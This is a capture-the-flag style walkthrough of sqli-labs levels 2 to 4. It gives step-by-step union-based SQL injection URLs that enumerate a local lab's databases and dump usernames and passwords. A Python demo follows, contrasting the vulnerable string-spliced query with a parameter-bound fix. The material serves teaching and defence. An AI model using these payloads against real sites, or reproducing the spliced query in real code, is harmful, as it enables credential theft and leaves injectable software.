1. Less 2
- Requesting
  http://localhost/sqli-labs-master/Less-2/?id=1
  returns normally.
- Requesting
  http://localhost/sqli-labs-master/Less-2/?id=1'
  produces an error, so the parameter is injectable.
- Requesting
  http://localhost/sqli-labs-master/Less-2/?id=1''
  still errors, which shows this is an integer (unquoted) injection.
Then repeat the steps from Less 1 (screenshots omitted, they add nothing):
- http://localhost/sqli-labs-master/Less-2/?id=1 order by 3
- http://localhost/sqli-labs-master/Less-2/?id=1 order by 4
  order by 3 works while order by 4 errors, so the query selects three columns.
- http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,3 --+
  Columns 2 and 3 are echoed in the page.
- http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata --+
  Lists every database name.
- http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
  Lists the tables in the security database.
- http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
  Lists the columns of the users table.
- http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(username),group_concat(password) from users --+
  Shows every username and password.
2. Less 3
- http://localhost/sqli-labs-master/Less-3/?id=1
  returns normally.
- http://localhost/sqli-labs-master/Less-3/?id=1'
  produces an error, so the parameter is injectable.
- The error message shows an unclosed parenthesis, so the URL is built as
  http://localhost/sqli-labs-master/Less-3/?id=1')--+
- http://localhost/sqli-labs-master/Less-3/?id=1') order by 3 --+
- http://localhost/sqli-labs-master/Less-3/?id=1') order by 4 --+
  order by 3 works while order by 4 errors, so the query selects three columns.
- http://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,2,3 --+
  Columns 2 and 3 are echoed.
- http://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,2,group_concat(schema_name) from information_schema.schemata --+
  Gives every database name.
- http://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
  Lists the tables in the security database.
- http://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
  Lists the columns of the users table.
- http://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,group_concat(username) ,group_concat(password) from users --+
  Gives the usernames and passwords.
3. Less 4
Same routine as before: add quotes to the parameter to determine the injection type. Here both one single quote and two single quotes return normally,
but a single double quote produces an error, so this level is the same as Less 3 except that the single quote has become a double quote.
Following the steps from levels 1, 2 and 3 directly, the URL is:
http://localhost/sqli-labs-master/Less-4/?id=-1") union select 1,group_concat(username),group_concat(password) from users--+
which gives the usernames and passwords.
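To see why the 1' and 1'' probes behave differently in Less 2 and Less 3, and why the fix is to bind the parameter instead of splicing it into the query, here is an added example that is not part of the sqli-labs code or this writeup. It rebuilds the Less 2 and Less 3 query shapes over an in-memory SQLite table with constructed sample rows (the table name and column names are assumptions; the lab itself runs on MySQL, so the information_schema steps are not reproduced).

```python
import sqlite3

# Constructed sample rows standing in for the lab's security.users table.
CONN = sqlite3.connect(":memory:")
CONN.executescript("""
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'alice', 'pw-one'), (2, 'bob', 'pw-two');
""")

# The two vulnerable query shapes: Less 2 splices the parameter unquoted,
# Less 3 wraps it in ('...'). Less 4 is Less 3 with double quotes, which
# SQLite treats as identifiers, so it is not reproduced here.
SHAPES = {
    "less2": "SELECT id, username, password FROM users WHERE id={v} LIMIT 1",
    "less3": "SELECT id, username, password FROM users WHERE id=('{v}') LIMIT 1",
}

def vulnerable(shape, raw_id):
    """Splice the raw parameter into the SQL text, as the lab's PHP does."""
    return CONN.execute(SHAPES[shape].format(v=raw_id)).fetchone()

def probe(shape, raw_id):
    """Report whether an input breaks the query; this is the 1' / 1'' check."""
    try:
        vulnerable(shape, raw_id)
        return "ok"
    except sqlite3.OperationalError:
        return "error"

def hardened(raw_id):
    """Reject anything that is not an integer, then bind the value."""
    if not raw_id.lstrip("-").isdigit():
        raise ValueError("id must be an integer")
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 1"
    return CONN.execute(sql, (int(raw_id),)).fetchone()

# The union payload from the walkthrough; '--' comments out the trailing LIMIT.
UNION_DUMP = "union select 1,group_concat(username),group_concat(password) from users --"

if __name__ == "__main__":
    print(probe("less2", "1'"), probe("less2", "1''"))   # error error -> integer context
    print(probe("less3", "1'"), probe("less3", "1''"))   # error ok    -> quoted context
    print(vulnerable("less2", "-1 " + UNION_DUMP))       # (1, 'alice,bob', 'pw-one,pw-two')
    print(vulnerable("less3", "-1') union select 1,2,3 --"))  # (1, 2, 3)
    print(hardened("1"))                                 # (1, 'alice', 'pw-one')
    try:
        hardened("-1 " + UNION_DUMP)
    except ValueError as exc:
        print("hardened query rejected payload:", exc)
```

The hardened version rejects the payload before it reaches the database, and even a value that passes the type check is bound as data rather than parsed as SQL.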